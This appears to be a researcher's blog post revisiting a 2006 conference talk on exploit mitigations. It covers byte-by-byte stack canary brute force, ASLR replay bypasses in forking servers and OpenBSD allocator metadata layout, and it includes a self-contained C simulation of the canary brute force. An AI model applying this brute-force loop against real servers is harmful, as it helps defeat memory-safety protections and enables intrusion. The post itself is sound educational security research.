In September of 2006 I released the following slide deck:
It was the first time I had ever spoken to a technical audience (Ruxcon in Sydney, Australia), and in retrospect it was a horribly boring presentation. Even still, there's some technical content in this slide deck that is still passingly relevant today:
- Even though server-side memory corruption bugs have been fairly sparse lately, using a non-null-terminated overflow to brute-force a stack canary byte by byte is still possible in some instances. The overflow has to come from a memcpy/read-style copy rather than strcpy, so that it can write any byte value (including 0x00), and the target has to keep the same canary across attempts (a forking server whose children inherit the parent's value, for example). The attacker then overwrites only the first byte of the canary, observes whether the child survives the check, and moves on to the next byte once a guess holds, so an n-byte canary costs at most 256*n attempts rather than 256^n. The technique was even featured in a recent Phrack article (Issue 67, Article 13).
- Similarly, the ASLR bypasses are probably still good for any remote exploit that can "replay" consecutive attempts without triggering a module/shared library rebase, i.e. where each attempt runs in a process that inherits the same address-space layout (a forked child) rather than in a freshly exec'd one.
- Finally, the approach to finding heap exploitation techniques still applies to a lot of custom allocators. Back in 2006, OpenBSD had just reimplemented malloc to remove the inline heap structures at the beginning (or end) of each chunk. Unfortunately, their implementation used itself to allocate memory for its own sensitive heap structures (i.e. malloc was used by malloc). This meant that an attacker could fairly easily arrange for an "interesting" chunk (one holding allocator metadata) to sit adjacent to the chunk being overflowed, regardless of application-specific behavior. Generally speaking, if a heap implementation can be induced into allocating and using, for its own metadata, a chunk of memory that sits contiguously after application chunks, then that heap implementation is broken: an application-level overflow can then corrupt the allocator's state directly, with no help from the application's own allocation pattern.
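The byte-for-byte canary brute force from the first point, as an added example that is not part of the original slides or post. It simulates a forking server in-process: `child_handles_request` stands in for a forked child that memcpy's a request into a 64-byte buffer sitting directly below an 8-byte canary, and the constructed `SECRET_CANARY` value stands in for the parent's canary that every child inherits unchanged (the same inheritance property is what lets the ASLR "replay" in the second point work). `bruteforce_canary` is the attacker side; the buffer size, canary value and function names are all assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN    64
#define CANARY_LEN 8

/* Constructed canary value standing in for the one the server's parent process
 * picked at startup; every forked child inherits it unchanged.  The low byte is
 * 0x00 on purpose: real canaries often contain one, which is exactly why a
 * strcpy-style (null-terminated) overflow cannot brute-force them but a
 * memcpy-style one can. */
static const uint8_t SECRET_CANARY[CANARY_LEN] =
    {0x00, 0x6a, 0xf1, 0x3c, 0x9d, 0x42, 0xb7, 0xe5};

/* Stand-in for one forked child handling one request.  The request body is
 * copied with memcpy into a fixed buffer that sits directly below the canary,
 * so any bytes beyond BUF_LEN overwrite the canary one byte at a time.
 * Returns 1 if the child survives the canary check (the attacker sees a
 * reply), 0 if it would be killed (the connection drops).  The parent's copy
 * of the canary is never touched, so the next child starts from the same value. */
static int child_handles_request(const uint8_t *req, size_t len)
{
    struct {
        uint8_t buf[BUF_LEN];
        uint8_t canary[CANARY_LEN];
    } frame;

    memcpy(frame.canary, SECRET_CANARY, CANARY_LEN);
    if (len > sizeof frame)
        len = sizeof frame;              /* keep the simulation itself in bounds */
    memcpy(&frame, req, len);            /* the non-null-terminated overflow */
    return memcmp(frame.canary, SECRET_CANARY, CANARY_LEN) == 0;
}

/* Attacker side: recover the canary one byte at a time.  Probe i sends
 * BUF_LEN filler bytes, the i bytes already recovered, and one guessed byte,
 * so only canary byte i is disturbed; the child survives iff the guess is
 * right.  Returns the number of probes used (at most 256 * CANARY_LEN),
 * or -1 if some byte never matched. */
static long bruteforce_canary(uint8_t recovered[CANARY_LEN])
{
    uint8_t probe[BUF_LEN + CANARY_LEN];
    long probes = 0;

    memset(probe, 'A', BUF_LEN);
    for (size_t i = 0; i < CANARY_LEN; i++) {
        int found = 0;
        for (int guess = 0; guess < 256; guess++) {
            probe[BUF_LEN + i] = (uint8_t)guess;
            probes++;
            if (child_handles_request(probe, BUF_LEN + i + 1)) {
                recovered[i] = (uint8_t)guess;
                found = 1;
                break;
            }
        }
        if (!found)
            return -1;
    }
    return probes;
}

/* Runs the attack end to end; returns the probe count if the recovered value
 * equals the real canary, -1 otherwise. */
static long run_demo(void)
{
    uint8_t canary[CANARY_LEN];
    long probes = bruteforce_canary(canary);

    if (probes < 0 || memcmp(canary, SECRET_CANARY, CANARY_LEN) != 0)
        return -1;
    return probes;
}

int main(void)
{
    uint8_t canary[CANARY_LEN];
    long probes = bruteforce_canary(canary);

    if (probes < 0) {
        puts("failed to recover canary");
        return 1;
    }
    printf("recovered canary in %ld probes (worst case %d): ",
           probes, 256 * CANARY_LEN);
    for (size_t i = 0; i < CANARY_LEN; i++)
        printf("%02x", canary[i]);
    putchar('\n');
    return 0;
}
```

Against a real target the "survives" signal is whether the child sends its normal reply or the connection is closed when `__stack_chk_fail` kills it; everything else in the loop is the same. Replacing memcpy with strcpy in `child_handles_request` shows the limitation the text describes: the copy stops at the first 0x00, so the canary's zero byte can never be written and the brute force stalls there.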
- email@example.com (@benhawkes)